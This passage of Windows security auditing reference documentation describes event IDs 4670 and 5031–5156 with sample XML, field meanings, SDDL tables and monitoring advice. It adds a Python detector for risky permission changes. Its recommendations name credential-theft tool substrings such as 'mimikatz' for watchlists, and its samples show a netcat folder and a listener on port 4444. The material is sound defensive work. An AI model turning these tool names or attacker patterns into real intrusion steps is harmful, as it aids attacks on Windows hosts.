<Data Name="SubjectUserName">DC01$</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x3e7</Data>
<Data Name="TransactionId">{17EF5E21-5E2C-11E5-810F-00155D987005}</Data>
<Data Name="NewState">52</Data>
<Data Name="ResourceManager">{5F5ED427-FCCA-11E3-BD73-B54AB417B853}</Data>
<Data Name="ProcessId">0x370</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account through which the state of the transaction was changed. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that changed the state of the transaction.
Account Domain [Type = UnicodeString]: domain or computer name. Formats vary, and include the
following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Transaction Information:
RM Transaction ID [Type = GUID]: unique GUID of the transaction. This field can help you correlate this event with other events that might contain the same Transaction ID, such as “4656(S, F): A handle to an object was requested.”

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

New State [Type = UInt32]: identifier of the new state of the transaction.
Resource Manager [Type = GUID]: unique GUID of the Resource Manager associated with this transaction.
Process Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the state of the transaction was changed. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.

Security Monitoring Recommendations


For 4985(S): The state of a transaction has changed.
This event typically has no security relevance and is used for Transaction Manager troubleshooting.
5051(-): A file was virtualized.

Applies to
Windows 10
Windows Server 2016
This event should be generated when a file was virtualized using LUAFV.
This event occurs very rarely during standard LUAFV file virtualization.
There is no example of this event in this document.
Subcategory: Audit File System
Event Schema:
A file was virtualized.
Subject:

Security ID:%1
Account Name:%2
Account Domain:%3
Logon ID:%4

Object:

File Name:%5
Virtual File Name:%6

Process Information:

Process ID:%7
Process Name:%8

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
4670(S): Permissions on an object were changed.

Applies to
Windows 10
Windows Server 2016
Subcategories: Audit File System, Audit Registry, Audit Authentication Policy Change, and Audit Authorization Policy Change
Event Description:
This event generates when the permissions for an object are changed. The object could be a file system, registry, or security token object.
This event does not generate if the SACL (Auditing ACL) was changed.
Before this event can generate, certain ACEs might need to be set in the object’s SACL. For example, for a file system object, it generates only if “Change Permissions” and/or “Take Ownership” are set in the object’s SACL. For a registry key, it generates only if “Write DAC” and/or “Write Owner” are set in the object’s SACL.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4670</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>13570</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-18T19:36:50.187044600Z" />
<EventRecordID>269529</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x43659</Data>
<Data Name="ObjectServer">Security</Data>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\Documents\netcat-1.11</Data>
<Data Name="HandleId">0x3f0</Data>
<Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="ProcessId">0xdb0</Data>
<Data Name="ProcessName">C:\Windows\System32\dllhost.exe</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested the “change object’s permissions” operation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested the “change object’s
permissions” operation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Object:
Object Server [Type = UnicodeString]: has “Security” value for this event.
Object Type [Type = UnicodeString]: The type of an object that was accessed during the operation.
The following table contains the list of the most common Object Types:

DIRECTORY, EVENT, TIMER, DEVICE, Mutant, Type, File, Token, Thread, Section, WindowStation, DebugObject,
FilterCommunicationPort, EventPair, Driver, IoCompletion, Controller, SymbolicLink, WmiGuid, Process,
Profile, Desktop, KeyedEvent, Adapter, Key, WaitablePort, Callback, Semaphore, Job, Port,
FilterConnectionPort, ALPC Port

Object Name [Type = UnicodeString]: name and other identifying information for the object for which
permissions were changed. For example, for a file, the path would be included. For Token objects, this field
typically equals “-“.
Handle ID [Type = Pointer]: hexadecimal value of a handle to Object Name. This field can help you correlate this event with other events that might contain the same Handle ID, for example, “4663(S): An attempt was made to access an object.” This parameter might not be captured in the event, and in that case appears as “0x0”.
Process:
Process ID [Type = Pointer]: hexadecimal Process ID of the process through which the permissions were changed. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Process Name [Type = UnicodeString]: full path and the name of the executable for the process.
Permissions Change:
Original Security Descriptor [Type = UnicodeString]: the old Security Descriptor Definition Language (SDDL) value for the object.
New Security Descriptor [Type = UnicodeString]: the new Security Descriptor Definition Language (SDDL) value for the object.

Note The Security Descriptor Definition Language (SDDL) defines string elements for enumerating information contained in the security descriptor.
Example:
O:BAG:SYD:(D;;0xf0007;;;AN)(D;;0xf0007;;;BG)(A;;0xf0007;;;SY)(A;;0x7;;;BA)S:ARAI(AU;SAFA;DCLCRPCRSDWDWO;;;WD)
O: = Owner. SID of specific security principal, or reserved (pre-defined) value, for example: BA (BUILTIN_ADMINISTRATORS), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the list of possible values in the table below:

VALUE  DESCRIPTION
"AO"   Account operators
"RU"   Alias to allow previous Windows 2000
"AN"   Anonymous logon
"AU"   Authenticated users
"BA"   Built-in administrators
"BG"   Built-in guests
"BO"   Backup operators
"BU"   Built-in users
"CA"   Certificate server administrators
"CG"   Creator group
"CO"   Creator owner
"DA"   Domain administrators
"DC"   Domain computers
"DD"   Domain controllers
"DG"   Domain guests
"DU"   Domain users
"EA"   Enterprise administrators
"ED"   Enterprise domain controllers
"WD"   Everyone
"PA"   Group Policy administrators
"IU"   Interactively logged-on user
"LA"   Local administrator
"LG"   Local guest
"LS"   Local service account
"SY"   Local system
"NU"   Network logon user
"NO"   Network configuration operators
"NS"   Network service account
"PO"   Printer operators
"PS"   Personal self
"PU"   Power users
"RS"   RAS servers group
"RD"   Terminal server users
"RE"   Replicator
"RC"   Restricted code
"SA"   Schema administrators
"SO"   Server operators
"SU"   Service logon user

G: = Primary Group.
D: = DACL Entries.
S: = SACL Entries.
DACL/SACL entry format:
entry_type:inheritance_flags(ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid)
Example: D:(A;;FA;;;WD)
entry_type:
“D” - DACL
“S” - SACL
inheritance_flags:
"P" - SDDL_PROTECTED: inheritance from containers that are higher in the folder hierarchy is blocked.
"AI" - SDDL_AUTO_INHERITED: inheritance is allowed, assuming that "P" is not also set.
"AR" - SDDL_AUTO_INHERIT_REQ: child objects inherit permissions from this object.
ace_type:
"A" - ACCESS ALLOWED
"D" - ACCESS DENIED
"OA" - OBJECT ACCESS ALLOWED: only applies to a subset of the object(s).
"OD" - OBJECT ACCESS DENIED: only applies to a subset of the object(s).
"AU" - SYSTEM AUDIT
"AL" - SYSTEM ALARM
"OU" - OBJECT SYSTEM AUDIT
"OL" - OBJECT SYSTEM ALARM
ace_flags:
"CI" - CONTAINER INHERIT: child objects that are containers, such as directories, inherit the ACE as an explicit ACE.
"OI" - OBJECT INHERIT: child objects that are not containers inherit the ACE as an explicit ACE.
"NP" - NO PROPAGATE: only immediate children inherit this ACE.
"IO" - INHERITANCE ONLY: the ACE doesn’t apply to this object, but may affect children via inheritance.
"ID" - ACE IS INHERITED
"SA" - SUCCESSFUL ACCESS AUDIT
"FA" - FAILED ACCESS AUDIT
rights: A hexadecimal string which denotes the access mask, or a reserved value, for example: FA (File All Access), FX (File Execute), FW (File Write), etc.

VALUE  DESCRIPTION
Generic access rights
"GA"   GENERIC ALL
"GR"   GENERIC READ
"GW"   GENERIC WRITE
"GX"   GENERIC EXECUTE
File access rights
"FA"   FILE ALL ACCESS
"FR"   FILE GENERIC READ
"FW"   FILE GENERIC WRITE
"FX"   FILE GENERIC EXECUTE
Registry key access rights
"KA"   KEY ALL ACCESS
"KR"   KEY READ
"KW"   KEY WRITE
"KX"   KEY EXECUTE
Directory service access rights
"RC"   Read Permissions
"SD"   Delete
"WD"   Modify Permissions
"WO"   Modify Owner
"RP"   Read All Properties
"WP"   Write All Properties
"CC"   Create All Child Objects
"DC"   Delete All Child Objects
"LC"   List Contents
"SW"   All Validated Writes
"LO"   List Object
"DT"   Delete Subtree
"CR"   All Extended Rights

object_guid: N/A
inherit_object_guid: N/A
account_sid: SID of specific security principal, or reserved value, for example: AN (Anonymous), WD (Everyone), SY (LOCAL_SYSTEM), etc. See the table above for more details.
For more information about SDDL syntax, see these articles: https://msdn.microsoft.com/library/cc230374.aspx,
https://msdn.microsoft.com/library/windows/hardware/aa374892(v=vs.85).aspx.

Security Monitoring Recommendations


For 4670(S): Permissions on an object were changed.
For token objects, this is typically an informational event, and at the same time it is difficult to identify which token's permissions were changed. For token objects, there are no monitoring recommendations for this event in this document.
For file system and registry objects, the following recommendations apply.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have a pre-defined “Process Name” for the process reported in this event, monitor all events with
“Process Name” not equal to your defined value.
You can monitor to see if “Process Name” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in process names (for example, “mimikatz” or
“cain.exe”), check for these substrings in “Process Name.”
If you have critical registry objects for which you need to monitor all modifications (especially permissions
changes and owner changes), monitor for the specific Object\Object Name.
If you have high-value computers for which you need to monitor all changes for all or specific objects (for
example, file system or registry objects), monitor for all 4670 events on these computers. For example, you
could monitor the ntds.dit file on domain controllers.
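The DACL diff a detection would run on this event, as an added example that is not Microsoft's code: it parses the Original and New Security Descriptor strings of the sample 4670 event above (embedded as constructed input), lists the ACEs the change added, and flags allow ACEs that grant write-like rights (the same bits recommended for file system objects at the top of this section) to broad principals such as Everyone (WD). The rights-code-to-mask table, the broad-principal set and the severity labels are assumptions of the example.

```python
import re
import xml.etree.ElementTree as ET

EVT_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"

# Constructed sample: the EventData of the 4670 event shown on this page
# (the <System> block is omitted; it is not needed for the SDDL analysis).
SAMPLE_4670 = r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<EventData>
<Data Name="ObjectType">File</Data>
<Data Name="ObjectName">C:\Documents\netcat-1.11</Data>
<Data Name="OldSd">D:AI(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="NewSd">D:ARAI(A;OICI;FA;;;WD)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-2104)(A;OICIID;FA;;;S-1-5-21-3457937927-2839227994-823803824-1104)(A;OICIID;FA;;;SY)(A;OICIID;FA;;;BA)</Data>
<Data Name="ProcessName">C:\Windows\System32\dllhost.exe</Data>
</EventData>
</Event>"""

# Access-mask values for the two-letter rights codes in the tables above (generic,
# standard, file and registry rights); assumed from the Windows SDK definitions.
RIGHTS_CODES = {
    "GA": 0x10000000, "GR": 0x80000000, "GW": 0x40000000, "GX": 0x20000000,
    "RC": 0x00020000, "SD": 0x00010000, "WD": 0x00040000, "WO": 0x00080000,
    "FA": 0x001F01FF, "FR": 0x00120089, "FW": 0x00120116, "FX": 0x001200A0,
    "KA": 0x000F003F, "KR": 0x00020019, "KW": 0x00020006, "KX": 0x00020019,
}
# Write-like bits this section recommends monitoring on file system objects (WriteData,
# AppendData, WriteEA, DeleteChild, WriteAttributes, DELETE, WRITE_DAC, WRITE_OWNER)
# plus GENERIC_ALL and GENERIC_WRITE, which imply them.
WRITE_BITS = (0x2 | 0x4 | 0x10 | 0x40 | 0x100 | 0x10000 | 0x40000 | 0x80000
              | 0x10000000 | 0x40000000)
# Aliases that stand for large, untrusted populations (assumed set).
BROAD_PRINCIPALS = {"WD", "AU", "AN", "BU", "BG", "DU", "IU", "NU"}

# An O:/G:/D:/S: component runs until the next component tag; ACEs are the
# parenthesised groups inside the D: and S: components.
COMPONENT_RE = re.compile(r"([OGDS]):((?:(?![OGDS]:)[^(]|\([^)]*\))*)")
ACE_RE = re.compile(r"\(([^)]*)\)")


def two_letter_codes(s):
    """Split a run of SDDL codes such as 'OICIID' into {'OI', 'CI', 'ID'}."""
    return {s[i:i + 2] for i in range(0, len(s), 2)}


def parse_sddl(sddl):
    """Return {'O': owner, 'G': group, 'D': (flags, aces), 'S': (flags, aces)};
    each ace is (ace_type, ace_flags, rights, object_guid, inherit_guid, sid)."""
    parts = {"O": "", "G": "", "D": ("", []), "S": ("", [])}
    for tag, body in COMPONENT_RE.findall(sddl):
        if tag in ("O", "G"):
            parts[tag] = body
        else:
            flags = body.split("(", 1)[0]
            parts[tag] = (flags, [tuple(a.split(";")) for a in ACE_RE.findall(body)])
    return parts


def rights_mask(rights):
    """Access mask for an SDDL rights field (hex literal or code string)."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for code in two_letter_codes(rights):
        mask |= RIGHTS_CODES.get(code, 0)  # unknown (DS-only) codes add nothing
    return mask


def event_data(xml_text):
    """EventData fields of a Security-channel event as a dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.iter(EVT_NS + "Data")}


def added_dacl_aces(old_sd, new_sd):
    """ACEs present in the new DACL but absent from the old one."""
    old = set(parse_sddl(old_sd)["D"][1])
    return [ace for ace in parse_sddl(new_sd)["D"][1] if ace not in old]


def analyze_4670(xml_text):
    """One finding per newly added allow ACE that grants write-like rights;
    severity is 'high' when the grantee is a broad alias such as Everyone."""
    data = event_data(xml_text)
    findings = []
    for ace in added_dacl_aces(data["OldSd"], data["NewSd"]):
        ace_type, ace_flags, rights, _obj, _inh, sid = ace[:6]
        if ace_type != "A" or not (rights_mask(rights) & WRITE_BITS):
            continue  # deny/audit ACEs and read-only grants are not escalations
        findings.append({
            "object": data.get("ObjectName", ""),
            "process": data.get("ProcessName", ""),
            "grantee": sid,
            "rights": rights,
            "inherits_to_children": bool(two_letter_codes(ace_flags) & {"OI", "CI"}),
            "severity": "high" if sid in BROAD_PRINCIPALS else "medium",
        })
    return findings
```

On the sample event this yields a single high-severity finding: an inheritable (OICI) FA grant to WD on C:\Documents\netcat-1.11 that was not in the old DACL.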
Audit Filtering Platform Connection

Applies to
Windows 10
Windows Server 2016
Audit Filtering Platform Connection determines whether the operating system generates audit events when
connections are allowed or blocked by the Windows Filtering Platform.
Windows Filtering Platform (WFP ) enables independent software vendors (ISVs) to filter and modify TCP/IP
packets, monitor or authorize connections, filter Internet Protocol security (IPsec)-protected traffic, and filter
remote procedure calls (RPCs).
This subcategory contains Windows Filtering Platform events about blocked and allowed connections, blocked and allowed port bindings, blocked and allowed port listening actions, and applications blocked from accepting incoming connections.
Event volume: High.

COMPUTER TYPE       GENERAL SUCCESS   GENERAL FAILURE   STRONGER SUCCESS   STRONGER FAILURE   COMMENTS
Domain Controller   No                Yes               IF                 Yes                See below
Member Server       No                Yes               IF                 Yes                See below
Workstation         No                Yes               IF                 Yes                See below

Comments (the same for all three computer types): Success auditing for this subcategory typically generates a very high volume of events, for example, one event for every connection that was made to the system. It is much more important to audit Failure events (blocked connections, for example). For recommendations for using and analyzing the collected information, see the Security Monitoring Recommendations sections.
IF - Enable Success audit in case you need to monitor successful outbound or inbound connections to and from untrusted IP addresses on high value computers or devices.

Events List:
5031(F): The Windows Firewall Service blocked an application from accepting incoming connections on the network.
5150(-): The Windows Filtering Platform blocked a packet.
5151(-): A more restrictive Windows Filtering Platform filter has blocked a packet.
5154(S): The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.
5155(F): The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.
5156(S): The Windows Filtering Platform has permitted a connection.
5157(F): The Windows Filtering Platform has blocked a connection.
5158(S): The Windows Filtering Platform has permitted a bind to a local port.
5159(F): The Windows Filtering Platform has blocked a bind to a local port.
5031(F): The Windows Firewall Service blocked an
application from accepting incoming connections on
the network.

Applies to
Windows 10
Windows Server 2016
Windows Server 2012 R2
Windows Server 2012
Subcategory: Audit Filtering Platform Connection
Event Description:
This event generates when an application was blocked from accepting incoming connections on the network by the Windows Filtering Platform.
If you don’t have any firewall rules (Allow or Deny) in Windows Firewall for specific applications, you will get this event from the Windows Filtering Platform layer, because by default this layer denies any incoming connections.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5031</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8010000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T03:46:36.634473000Z" />
<EventRecordID>304373</EventRecordID>
<Correlation />
<Execution ProcessID="516" ThreadID="2976" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="Profiles">Domain</Data>
<Data Name="Application">C:\documents\listener.exe</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Profiles [Type = UnicodeString]: network profile under which the application was blocked. Possible values:
Domain
Public
Private
Application [Type = UnicodeString]: full path and file name of the executable file for the blocked application.

Security Monitoring Recommendations


For 5031(F): The Windows Firewall Service blocked an application from accepting incoming connections on the network.
You can use this event to detect applications for which no Windows Firewall rules were created.
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
5150(-): The Windows Filtering Platform blocked a
packet.

Applies to
Windows 10
Windows Server 2016
This event is logged if the Windows Filtering Platform MAC filter blocked a packet.
There is no example of this event in this document.
Subcategory: Audit Filtering Platform Connection
Event Schema:
The Windows Filtering Platform has blocked a packet.
Network Information:

Direction:%1
Source Address:%2
Destination Address:%3
EtherType:%4
MediaType:%5
InterfaceType:%6
VlanTag:%7

Filter Information:

Filter Run-Time ID:%8
Layer Name:%9
Layer Run-Time ID:%10

Required Server Roles: None.


Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
5151(-): A more restrictive Windows Filtering Platform
filter has blocked a packet.

Applies to
Windows 10
Windows Server 2016
This event is logged if a more restrictive Windows Filtering Platform MAC filter has blocked a packet.
There is no example of this event in this document.
Subcategory: Audit Filtering Platform Connection
Event Schema:
A more restrictive Windows Filtering Platform filter has blocked a packet.
Network Information:

Direction:%1
Source Address:%2
Destination Address:%3
EtherType:%4
MediaType:%5
InterfaceType:%6
VlanTag:%7

Filter Information:

Filter Run-Time ID:%8
Layer Name:%9
Layer Run-Time ID:%10

Required Server Roles: None.


Minimum OS Version: Windows Server 2012, Windows 8.
Event Versions: 0.

Security Monitoring Recommendations


There is no recommendation for this event in this document.
5154(S): The Windows Filtering Platform has
permitted an application or service to listen on a port
for incoming connections.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Connection
Event Description:
This event generates every time the Windows Filtering Platform permits an application or service to listen on a port.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5154</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T02:04:25.757462900Z" />
<EventRecordID>287929</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="3968" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessId">4152</Data>
<Data Name="Application">\device\harddiskvolume2\documents\listener.exe</Data>
<Data Name="SourceAddress">0.0.0.0</Data>
<Data Name="SourcePort">4444</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">0</Data>
<Data Name="LayerName">%%14609</Data>
<Data Name="LayerRTID">40</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which was permitted to listen on the port. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column).

If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process. The logical disk is displayed in the format \device\harddiskvolume#. You can get all local volume numbers by using the diskpart utility; the diskpart command to list volume numbers is “list volume”.

Network Information:
Source Address [Type = UnicodeString]: local IP address on which application requested to listen on the
port.
IPv4 Address
IPv6 Address
:: - all IP addresses in IPv6 format
0.0.0.0 - all IP addresses in IPv4 format
127.0.0.1 , ::1 - localhost
Source Port [Type = UnicodeString]: source TCP\UDP port number which the application requested to listen on.
Protocol [Type = UInt32]: protocol number. For example:
6 – TCP.
17 – UDP.
More information about possible values for this field:
https://technet.microsoft.com/library/cc959827.aspx.
Filter Information:
Filter Run-Time ID [Type = UInt64]: unique ID of the filter which allows the application to listen on the specific port. By default Windows firewall won't prevent a port from being listened on by an application, and if this application doesn’t match any filters you will get the value 0 in this field.
To find a specific Windows Filtering Platform filter by ID you need to execute the following command: netsh wfp show filters. As a result of this command a filters.xml file will be generated. You need to open this file and find the substring with the required filter ID (<filterId>).
Layer Name [Type = UnicodeString]: Application Layer Enforcement layer name.
Layer Run-Time ID [Type = UInt64]: Windows Filtering Platform layer identifier. To find a specific Windows Filtering Platform layer ID you need to execute the following command: netsh wfp show state. As a result of this command a wfpstate.xml file will be generated. You need to open this file and find the substring with the required layer ID (<layerId>).
Security Monitoring Recommendations
For 5154(S): The Windows Filtering Platform has permitted an application or service to listen on a port for incoming connections.
If you have a “whitelist” of applications that are associated with certain operating systems or server roles,
and that are expected to listen on specific ports, monitor this event for “Application Name” and other
relevant information.
If a certain application is allowed to listen only on specific port numbers, monitor this event for
“Application Name” and “Network Information\Source Port.”
If a certain application is allowed to listen only on a specific IP address, monitor this event for “Application
Name” and “Network Information\Source Address.”
If a certain application is allowed to use only TCP or UDP protocols, monitor this event for “Application
Name” and the protocol number in “Network Information\Protocol.”
If you have a pre-defined application which should be used to perform the operation that was reported by
this event, monitor events with “Application” not equal to your defined application.
You can monitor to see if “Application” is not in a standard folder (for example, not in System32 or
Program Files) or is in a restricted folder (for example, Temporary Internet Files).
If you have a pre-defined list of restricted substrings or words in application names (for example,
“mimikatz” or “cain.exe”), check for these substrings in “Application.”
Typically this event has an informational purpose.
5155(F): The Windows Filtering Platform has blocked an application or service from listening on a port for incoming connections.
4/5/2019 • 2 minutes to read

Applies to
Windows 10
Windows Server 2016
By default, Windows Firewall does not prevent an application from listening on a port. In other words, a Windows system will not generate event 5155 by itself.
You can add your own filters using the WFP APIs to block listening and so reproduce this event:
https://msdn.microsoft.com/library/aa364046(v=vs.85).aspx.
There is no event example in this document.
Subcategory: Audit Filtering Platform Connection
Event Schema:
The Windows Filtering Platform has blocked an application or service from listening on a port for incoming
connections.
Application Information:

Process ID:%1
Application Name:%2

Network Information:

Source Address:%3
Source Port:%4
Protocol:%5

Filter Information:

Filter Run-Time ID:%6


Layer Name:%7
Layer Run-Time ID:%8

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Security Monitoring Recommendations
If you use Windows Filtering Platform APIs to block applications or services from listening on a port, you can use this event for troubleshooting and monitoring.
5156(S): The Windows Filtering Platform has permitted a connection.
4/5/2019 • 4 minutes to read

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Filtering Platform Connection
Event Description:
This event generates when Windows Filtering Platform has allowed a connection.

Note: For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>5156</EventID>
<Version>1</Version>
<Level>0</Level>
<Task>12810</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-22T05:24:22.622090200Z" />
<EventRecordID>308129</EventRecordID>
<Correlation />
<Execution ProcessID="4" ThreadID="3712" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
<EventData>
<Data Name="ProcessID">4556</Data>
<Data Name="Application">\\device\\harddiskvolume2\\documents\\listener.exe</Data>
<Data Name="Direction">%%14592</Data>
<Data Name="SourceAddress">10.0.0.10</Data>
<Data Name="SourcePort">3333</Data>
<Data Name="DestAddress">10.0.0.100</Data>
<Data Name="DestPort">49278</Data>
<Data Name="Protocol">6</Data>
<Data Name="FilterRTID">70201</Data>
<Data Name="LayerName">%%14610</Data>
<Data Name="LayerRTID">44</Data>
<Data Name="RemoteUserID">S-1-0-0</Data>
<Data Name="RemoteMachineID">S-1-0-0</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Application Information:
Process ID [Type = Pointer]: hexadecimal Process ID of the process which received the connection. Process ID (PID) is a number used by the operating system to uniquely identify an active process. To see the PID for a specific process you can, for example, use Task Manager (Details tab, PID column):
If you convert the hexadecimal value to decimal, you can compare it to the values in Task Manager.
You can also correlate this process ID with a process ID in other events, for example, “4688: A new process
has been created” Process Information\New Process ID.
Application Name [Type = UnicodeString]: full path and the name of the executable for the process.
Logical disk is displayed in format \device\harddiskvolume#. You can get all local volume numbers by using
diskpart utility. The command to get volume numbers using diskpart is “list volume”:

Network Information:
Direction [Type = UnicodeString]: direction of the allowed connection.
Inbound – for inbound connections.
